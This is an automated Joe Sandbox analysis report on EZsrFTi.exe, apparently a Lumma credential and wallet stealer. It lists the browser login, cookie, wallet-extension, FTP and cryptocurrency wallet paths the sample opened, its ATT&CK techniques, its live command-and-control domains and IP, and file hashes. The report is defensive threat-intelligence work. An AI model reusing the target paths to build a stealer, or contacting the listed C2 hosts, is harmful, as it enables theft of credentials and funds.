                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: Process Memory Space: EZsrFTi.exe PID: 7732, type: MEMORYSTR
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: EZsrFTi.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.EZsrFTi.exe.620000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.EZsrFTi.exe.39e9550.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.EZsrFTi.exe.39e9550.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1292054697.0000000000622000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        211
                        Process Injection
                        23
                        Virtualization/Sandbox Evasion
                        2
                        OS Credential Dumping
                        1
                        Query Registry
                        Remote Services1
                        Screen Capture
                        21
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        PowerShell
                        Boot or Logon Initialization Scripts1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        LSASS Memory231
                        Security Software Discovery
                        Remote Desktop Protocol1
                        Archive Collected Data
                        2
                        Non-Application Layer Protocol
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                        Process Injection
                        Security Account Manager23
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin Shares41
                        Data from Local System
                        113
                        Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                        Deobfuscate/Decode Files or Information
                        NTDS1
                        Process Discovery
                        Distributed Component Object Model3
                        Clipboard Data
                        Protocol ImpersonationTraffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                        Obfuscated Files or Information
                        LSA Secrets1
                        Application Window Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Software Packing
                        Cached Domain Credentials1
                        File and Directory Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Timestomp
                        DCSync22
                        System Information Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        EZsrFTi.exe28%VirustotalBrowse
                        EZsrFTi.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://sobrattyeu.bond/pi0%Avira URL Cloudsafe
                        https://sobrattyeu.bond/0%Avira URL Cloudsafe
                        stripedre-lot.bond0%Avira URL Cloudsafe
                        pain-temper.bond0%Avira URL Cloudsafe
                        immolatechallen.bond0%Avira URL Cloudsafe
                        growthselec.bond0%Avira URL Cloudsafe
                        sobrattyeu.bond0%Avira URL Cloudsafe
                        jarry-deatile.bond0%Avira URL Cloudsafe
                        crookedfoshe.bond0%Avira URL Cloudsafe
                        jarry-fixxer.bond0%Avira URL Cloudsafe
                        https://sobrattyeu.bond/api0%Avira URL Cloudsafe
                        strivehelpeu.bond0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        sobrattyeu.bond
                        104.21.64.1
                        truetrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          jarry-deatile.bondtrue
                          • Avira URL Cloud: safe
                          unknown
                          immolatechallen.bondtrue
                          • Avira URL Cloud: safe
                          unknown
                          stripedre-lot.bondtrue
                          • Avira URL Cloud: safe
                          unknown
                          jarry-fixxer.bondtrue
                          • Avira URL Cloud: safe
                          unknown
                          sobrattyeu.bondtrue
                          • Avira URL Cloud: safe
                          unknown
                          pain-temper.bondtrue
                          • Avira URL Cloud: safe
                          unknown
                          crookedfoshe.bondtrue
                          • Avira URL Cloud: safe
                          unknown
                          growthselec.bondtrue
                          • Avira URL Cloud: safe
                          unknown
                          https://sobrattyeu.bond/apitrue
                          • Avira URL Cloud: safe
                          unknown
                          strivehelpeu.bondtrue
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://sobrattyeu.bond/EZsrFTi.exe, 00000004.00000002.2540265272.0000000003C40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://sobrattyeu.bond/piEZsrFTi.exe, 00000004.00000002.2539623279.00000000014A7000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://upx.sf.netAmcache.hve.7.drfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.21.64.1
                            sobrattyeu.bondUnited States
                            13335CLOUDFLARENETUStrue
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1592068
                            Start date and time:2025-01-15 18:10:08 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 55s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:15
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:EZsrFTi.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@8/5@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 31
                            • Number of non-executed functions: 56
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.159.68, 13.107.246.45, 4.245.163.56
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            12:11:05API Interceptor8x Sleep call for process: EZsrFTi.exe modified
                            12:11:23API Interceptor1x Sleep call for process: WerFault.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.21.64.1NVIDIAShare.exe.bin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            • bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.php
                            gem2.exeGet hashmaliciousUnknownBrowse
                            • securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                            SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                            • www.mffnow.info/0pqe/
                            4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                            • www.vilakodsiy.sbs/w7eo/
                            1162-201.exeGet hashmaliciousFormBookBrowse
                            • www.mzkd6gp5.top/utww/
                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                            • www.mzkd6gp5.top/3u0p/
                            Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                            • ordrr.statementquo.com/QCbxA/
                            SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                            • adsfirm.com/administrator/index.php
                            PO2412010.exeGet hashmaliciousFormBookBrowse
                            • www.bser101pp.buzz/v89f/
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            sobrattyeu.bondXeno.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                            • 104.21.96.1
                            Adobe-Acrobat-Pro-2025.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                            • 104.21.80.1
                            random.exeGet hashmaliciousLummaCBrowse
                            • 104.21.96.1
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSNEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                            • 104.21.96.1
                            https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                            • 104.21.79.87
                            DOCU800147001.exeGet hashmaliciousGuLoaderBrowse
                            • 104.21.32.1
                            firstontario.docxGet hashmaliciousUnknownBrowse
                            • 1.1.1.1
                            lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                            • 104.21.67.165
                            https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082Get hashmaliciousUnknownBrowse
                            • 104.21.78.33
                            https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''Get hashmaliciousUnknownBrowse
                            • 104.21.32.1
                            https://tinyurl.com/AmconconstructionGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].emlGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.25.14
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            a0e9f5d64349fb13191bc781f81f42e1lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                            • 104.21.64.1
                            L#U043e#U0430d#U0435r.exeGet hashmaliciousLummaCBrowse
                            • 104.21.64.1
                            Xeno.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                            • 104.21.64.1
                            Adobe-Acrobat-Pro-2025.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                            • 104.21.64.1
                            MotivatedFunded.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.64.1
                            Set-Up.exeGet hashmaliciousLummaCBrowse
                            • 104.21.64.1
                            ActiVe_Ver_Set-UpFilE.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.64.1
                            00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                            • 104.21.64.1
                            No context
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9060038100507476
                            Encrypted:false
                            SSDEEP:96:ynFhX5oe0c9sggKjTOAqyS3QXIDcQlc6VcEdcw3V+BHUHZ0ownOgHkEwH3dEFYAz:wTJoe0c98A0LR3EauOzuiFfZ24IO8m
                            MD5:C1EA77C174EF9DD3DAAF96FF92F67308
                            SHA1:74BE34262591D28195A3EB9E2BAA54B9C64DCEC3
                            SHA-256:0E974B58A4891DE1A3A4D990368D0671C1B7BCDBE60BEEBCA479E9B78200C70E
                            SHA-512:710C755FD28F5F461F218B5AB4513D266071E5A9160DCBAE73D7697611B4351979CDA20AB91BBEDE6E27D3BDFA437F27D79FB375F113A29A1696B6FCEAC5E6B2
                            Malicious:true
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.3.4.6.6.4.6.6.0.0.1.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.3.4.6.6.5.8.4.7.5.1.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.3.9.f.8.0.0.-.7.d.3.8.-.4.2.e.d.-.b.1.3.d.-.5.5.f.d.9.a.e.4.d.d.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.3.3.5.6.7.0.-.9.5.e.3.-.4.6.4.b.-.b.4.c.d.-.6.1.0.0.3.f.e.1.d.1.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.Z.s.r.F.T.i...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.e.4.-.0.0.0.1.-.0.0.1.3.-.4.4.7.f.-.4.0.7.5.7.0.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.7.9.c.6.5.b.0.b.7.8.d.7.d.2.8.7.2.9.e.3.e.c.e.9.9.e.8.8.8.c.a.3.a.c.d.d.4.7.e.7.!.E.Z.s.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Wed Jan 15 17:11:04 2025, 0x1205a4 type
                            Category:dropped
                            Size (bytes):165980
                            Entropy (8bit):3.8834800197683697
                            Encrypted:false
                            SSDEEP:1536:2xaYX2AftW3d5GtTcTSVXsQ0pN4uE2aO497RCDYuBojRpLTg3B9Sb:2cXAOyG4uEq49gMpLTgx9S
                            MD5:D304F23484F023B7F044BE40310FFE95
                            SHA1:894FB80D16209B5E5FFA20D2BA88223EB0874545
                            SHA-256:95BCB02960B8D816473E1DABEE6605DC8DEC7F3468FCFFB4D9924032A601EDA4
                            SHA-512:1EAD925090D77449DB44392C2937E28D64EE654BB8A72EE85B2DE47E77A40127EEC35C162E414BEDEA195040627623490CD1F02F44BEAFD221FF18DCEBCE2F2A
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... .......(.g....................................$...........4...N0..........`.......8...........T............$...c..........8...........$...............................................................................eJ..............GenuineIntel............T...........'.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8374
                            Entropy (8bit):3.6923975730946084
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJqv6+WB6YeYSU92AwgmfhVJQpr789b5Jsf6Tm:R6lXJS6Z6YBSU9ugmfhVJp5if3
                            MD5:4E47FAA92BA22D13F1EF05E4BC743A2E
                            SHA1:EB01A8A6970A7D2EE316B89C5D3B22C09BEEE41A
                            SHA-256:56E3792C785B5D9770F2A8B120ACC5CD1999B9AF2E85EA7BEFA6F064DAAA94B3
                            SHA-512:0EE6AC289E6765ECB1E69F15DD143F96606F8AB4A8BDE8E2506DA552D94754EACF0909570D7B5595E9F0A1DCE12C79B279E845818D1782EABF922D3B245B964C
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.5.2.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4735
                            Entropy (8bit):4.454138419477644
                            Encrypted:false
                            SSDEEP:96:uIjfaI7VN7VrFJBggfbKygfl5QcSe0S6d:uIWYVN75PBgg7g/xSFS4
                            MD5:67630439E54FCF39B3E6089412628C31
                            SHA1:FB66FAC3420D9D934F47507EEE34CB5EF10042C6
                            SHA-256:F2A2C72F299478B77517816CD9C13B6CC5B096AE0ACE466909F990675CD2833B
                            SHA-512:3CF4C19FAD35173EDC3F0E668F17C57A977830270FFEB0AB687CC87BC1E312EE2495113E50988568032D650E21548FDDB20FE7D97404AE67B00EBEDDAC9A47B6
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677293" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.298865512078589
                            Encrypted:false
                            SSDEEP:6144:aECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lR6SD6VJSRiT:HCsL6seqD5Sm6SWVARi
                            MD5:AE6421EA78D8B678A2265828E5DED4BB
                            SHA1:386E3711C197D8739651EC83137B9787CA97816B
                            SHA-256:96BA84652E8A30D560FABD28D40351107AA24D79FB3DDC588C1C929B6B71A0D8
                            SHA-512:67E931F55B7D8646833C1C8322925BB32687BE4CF229D4481B2E6AF34785C86B27B8E885400B0652AEDF35DBC63CB2C36A2A0354B33973E114B419C79C6674CC
                            Malicious:false
                            Reputation:low
                            Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.@.upg..............................................................................................................................................................................................................................................................................................................................................(-.A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.868327806136689
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:EZsrFTi.exe
                            File size:376'320 bytes
                            MD5:c0a15c8328d0eb6c48c194ca52787560
                            SHA1:79c65b0b78d7d28729e3ece99e888ca3acdd47e7
                            SHA256:cf6e4051d20e654347161dc77b59840a6270cad5e63b4a59a59148c37e776f99
                            SHA512:67662b0ab1afbaf4d6dfd9733b6a3eda160b5e5d36049dabda1f668992ab8c9f0f80112c117ad1e5c891b17e8715674dae0d28888157f1c725bb422e64aa4b5a
                            SSDEEP:6144:HyJN9fU7GJcGosSgutOEUv340hN9DEGzjgoujWjOI0uf+yf8bErafbonXPajR8dc:SJN9HoD9qv34uN9DHsouaB0ufHazoXCt
                            TLSH:FF8412057A93B772C5388778D4E3851406B697D72A33E25B3D4872BA9D233C0DA42FB9
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|G................0.................. ... ....@.. .......................@............`................................
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x41039e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
